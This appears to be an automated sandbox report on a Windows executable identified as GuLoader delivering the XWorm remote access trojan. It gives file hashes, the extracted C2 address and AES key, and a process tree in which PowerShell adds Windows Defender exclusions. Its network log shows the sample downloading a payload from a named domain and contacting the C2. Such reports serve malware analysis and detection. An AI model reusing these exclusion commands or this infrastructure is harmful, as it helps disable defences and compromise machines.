Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

24/11/2024, 15:40 UTC

241124-s4cllssndp 10

24/11/2024, 15:36 UTC

241124-s1w6vasmdk 10

Analysis

  • max time kernel
    59s
  • max time network
    69s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24/11/2024, 15:40 UTC

General

  • Target

    18ea5087eb82e075ca35d2b2dcff9450.exe

  • Size

    555KB

  • MD5

    18ea5087eb82e075ca35d2b2dcff9450

  • SHA1

    dc436fbaa777672d44a8b90b98c4a1c266885845

  • SHA256

    a7247c64cc0168290ca3b210e59ef629b46f513205bc6562ec79cdd2cda71725

  • SHA512

    8fbeb3caf13a3fe1359002c2848ff5767e6b2f226049546c683f2b6144756196cfe39f66e4959c8426cdfaeff6a169a4cf5939de241e4a898887d8810ec620c6

  • SSDEEP

    12288:32EIiN/Z1++w1p+wJuQbIgJwCQBk5wBcamd3ZhZs:3wiN/K+wHBfhQBk5s3mdPZs

Malware Config

Extracted

Family

xworm

Version

3.1

C2

87.121.86.8:4020

Mutex

ssjpS2lhbkGsnEgT

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain
1
9g5AvmiEFB6IX39iQ9WYsA==

Signatures

  • Detect Xworm Payload 1 IoCs
  • Guloader family
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe
    "C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:3628
    • C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe
      "C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe"
      2⤵
      • Drops startup file
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3188
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4584
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18ea5087eb82e075ca35d2b2dcff9450.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4720
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\18ea5087eb82e075ca35d2b2dcff9450.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2988
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2248
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3224

    Network

    • flag-us
      DNS
      mertvinc.com.tr
      18ea5087eb82e075ca35d2b2dcff9450.exe
      Remote address:
      8.8.8.8:53
      Request
      mertvinc.com.tr
      IN A
      Response
      mertvinc.com.tr
      IN A
      185.244.144.68
    • flag-us
      DNS
      68.144.244.185.in-addr.arpa
      18ea5087eb82e075ca35d2b2dcff9450.exe
      Remote address:
      8.8.8.8:53
      Request
      68.144.244.185.in-addr.arpa
      IN PTR
      Response
      68.144.244.185.in-addr.arpa
      IN PTR
      185-244-144-68birbircomtr
    • flag-tr
      GET
      http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin
      18ea5087eb82e075ca35d2b2dcff9450.exe
      Remote address:
      185.244.144.68:80
      Request
      GET /SJatcRCUnkMIpuGcrVu155.bin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
      Host: mertvinc.com.tr
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Connection: Keep-Alive
      Content-Type: application/octet-stream
      Last-Modified: Wed, 20 Nov 2024 06:43:56 GMT
      Etag: "8e40-673d852c-bd5a9871c8854887;;;"
      Accept-Ranges: bytes
      Content-Length: 36416
      Date: Sun, 24 Nov 2024 14:47:17 GMT
      Server: LiteSpeed
      X-Powered-By: PleskLin
    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • 185.244.144.68:80
      http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin
      http
      18ea5087eb82e075ca35d2b2dcff9450.exe
      1.7kB
      38.0kB
      32
      31

      HTTP Request

      GET http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin

      HTTP Response

      200
    • 87.121.86.8:4020
      18ea5087eb82e075ca35d2b2dcff9450.exe
      260 B
      5
    • 87.121.86.8:4020
      18ea5087eb82e075ca35d2b2dcff9450.exe
      208 B
      4
    • 8.8.8.8:53
      mertvinc.com.tr
      dns
      18ea5087eb82e075ca35d2b2dcff9450.exe
      134 B
      192 B
      2
      2

      DNS Request

      mertvinc.com.tr

      DNS Response

      185.244.144.68

      DNS Request

      68.144.244.185.in-addr.arpa

    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
      90 B
      1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d0c46cad6c0778401e21910bd6b56b70

      SHA1

      7be418951ea96326aca445b8dfe449b2bfa0dca6

      SHA256

      9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

      SHA512

      057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      db92d7041e62fca2713935081f1c4a78

      SHA1

      8c0fd39ff312916983080f1cfc7ec620686c1d07

      SHA256

      29b298203b31984a0a51e20d9d816b5fda7013a8390d93d327ec2a72486d65b9

      SHA512

      ecd20994c634bda0d20a344fe1cdea7f00154b83f19213a4d1205aec21deb1f03d1eb85c9c93bd7a6cc000dbdb6d1acfdf81d072c715b6a2d53067298b1f7359

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      6fc9e38f184d3b1e45cdc8758b9346b6

      SHA1

      7bce57efd6a77a3bfe8c53ad443e3faa18740568

      SHA256

      21e6f547ca65e845c9e4fb8e278689b07b124a93d435143a8e0eec4151d62391

      SHA512

      894805a8282c72f355a50216329e682fc36981789f1cdcfe48d3a6383d875f8f270bb29a98e3039dd6007eb49e86c29f68f8e20548a81c4eaf4bae0aa70fed07

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbnwudxm.3r4.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\nsq88F7.tmp\System.dll

      Filesize

      11KB

      MD5

      75ed96254fbf894e42058062b4b4f0d1

      SHA1

      996503f1383b49021eb3427bc28d13b5bbd11977

      SHA256

      a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7

      SHA512

      58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4

    • memory/2988-88-0x000000006E4E0000-0x000000006E52C000-memory.dmp

      Filesize

      304KB

    • memory/3188-102-0x0000000037200000-0x00000000377A6000-memory.dmp

      Filesize

      5.6MB

    • memory/3188-14-0x00000000007E0000-0x0000000001AF7000-memory.dmp

      Filesize

      19.1MB

    • memory/3188-15-0x00000000007E0000-0x00000000007F0000-memory.dmp

      Filesize

      64KB

    • memory/3188-16-0x0000000036900000-0x000000003699C000-memory.dmp

      Filesize

      624KB

    • memory/3188-18-0x00007FF9377C0000-0x00007FF9379C9000-memory.dmp

      Filesize

      2.0MB

    • memory/3188-104-0x00000000379D0000-0x00000000379DA000-memory.dmp

      Filesize

      40KB

    • memory/3188-103-0x0000000037910000-0x00000000379A2000-memory.dmp

      Filesize

      584KB

    • memory/3188-12-0x00007FF9377C0000-0x00007FF9379C9000-memory.dmp

      Filesize

      2.0MB

    • memory/3628-13-0x0000000002F00000-0x0000000005439000-memory.dmp

      Filesize

      37.2MB

    • memory/3628-11-0x0000000002F00000-0x0000000005439000-memory.dmp

      Filesize

      37.2MB

    • memory/3628-10-0x00007FF9377C0000-0x00007FF9379C9000-memory.dmp

      Filesize

      2.0MB

    • memory/3628-9-0x00007FF9377C1000-0x00007FF9378EA000-memory.dmp

      Filesize

      1.2MB

    • memory/3628-8-0x0000000002F00000-0x0000000005439000-memory.dmp

      Filesize

      37.2MB

    • memory/4584-35-0x0000000006DC0000-0x0000000006DF4000-memory.dmp

      Filesize

      208KB

    • memory/4584-53-0x0000000007D90000-0x0000000007DA5000-memory.dmp

      Filesize

      84KB

    • memory/4584-36-0x000000006E4E0000-0x000000006E52C000-memory.dmp

      Filesize

      304KB

    • memory/4584-45-0x00000000079D0000-0x00000000079EE000-memory.dmp

      Filesize

      120KB

    • memory/4584-46-0x0000000007A00000-0x0000000007AA4000-memory.dmp

      Filesize

      656KB

    • memory/4584-47-0x0000000008180000-0x00000000087FA000-memory.dmp

      Filesize

      6.5MB

    • memory/4584-48-0x0000000007B40000-0x0000000007B5A000-memory.dmp

      Filesize

      104KB

    • memory/4584-49-0x0000000007BB0000-0x0000000007BBA000-memory.dmp

      Filesize

      40KB

    • memory/4584-50-0x0000000007DE0000-0x0000000007E76000-memory.dmp

      Filesize

      600KB

    • memory/4584-51-0x0000000007D50000-0x0000000007D61000-memory.dmp

      Filesize

      68KB

    • memory/4584-52-0x0000000007D80000-0x0000000007D8E000-memory.dmp

      Filesize

      56KB

    • memory/4584-34-0x0000000006830000-0x000000000687C000-memory.dmp

      Filesize

      304KB

    • memory/4584-54-0x0000000007EA0000-0x0000000007EBA000-memory.dmp

      Filesize

      104KB

    • memory/4584-55-0x0000000007E80000-0x0000000007E88000-memory.dmp

      Filesize

      32KB

    • memory/4584-33-0x0000000006800000-0x000000000681E000-memory.dmp

      Filesize

      120KB

    • memory/4584-19-0x0000000002FE0000-0x0000000003016000-memory.dmp

      Filesize

      216KB

    • memory/4584-32-0x0000000006350000-0x00000000066A7000-memory.dmp

      Filesize

      3.3MB

    • memory/4584-20-0x0000000005BD0000-0x00000000061FA000-memory.dmp

      Filesize

      6.2MB

    • memory/4584-23-0x00000000062E0000-0x0000000006346000-memory.dmp

      Filesize

      408KB

    • memory/4584-22-0x0000000006270000-0x00000000062D6000-memory.dmp

      Filesize

      408KB

    • memory/4584-21-0x0000000005960000-0x0000000005982000-memory.dmp

      Filesize

      136KB

    • memory/4720-69-0x000000006E4E0000-0x000000006E52C000-memory.dmp

      Filesize

      304KB

    • memory/4720-59-0x0000000005B30000-0x0000000005E87000-memory.dmp

      Filesize

      3.3MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.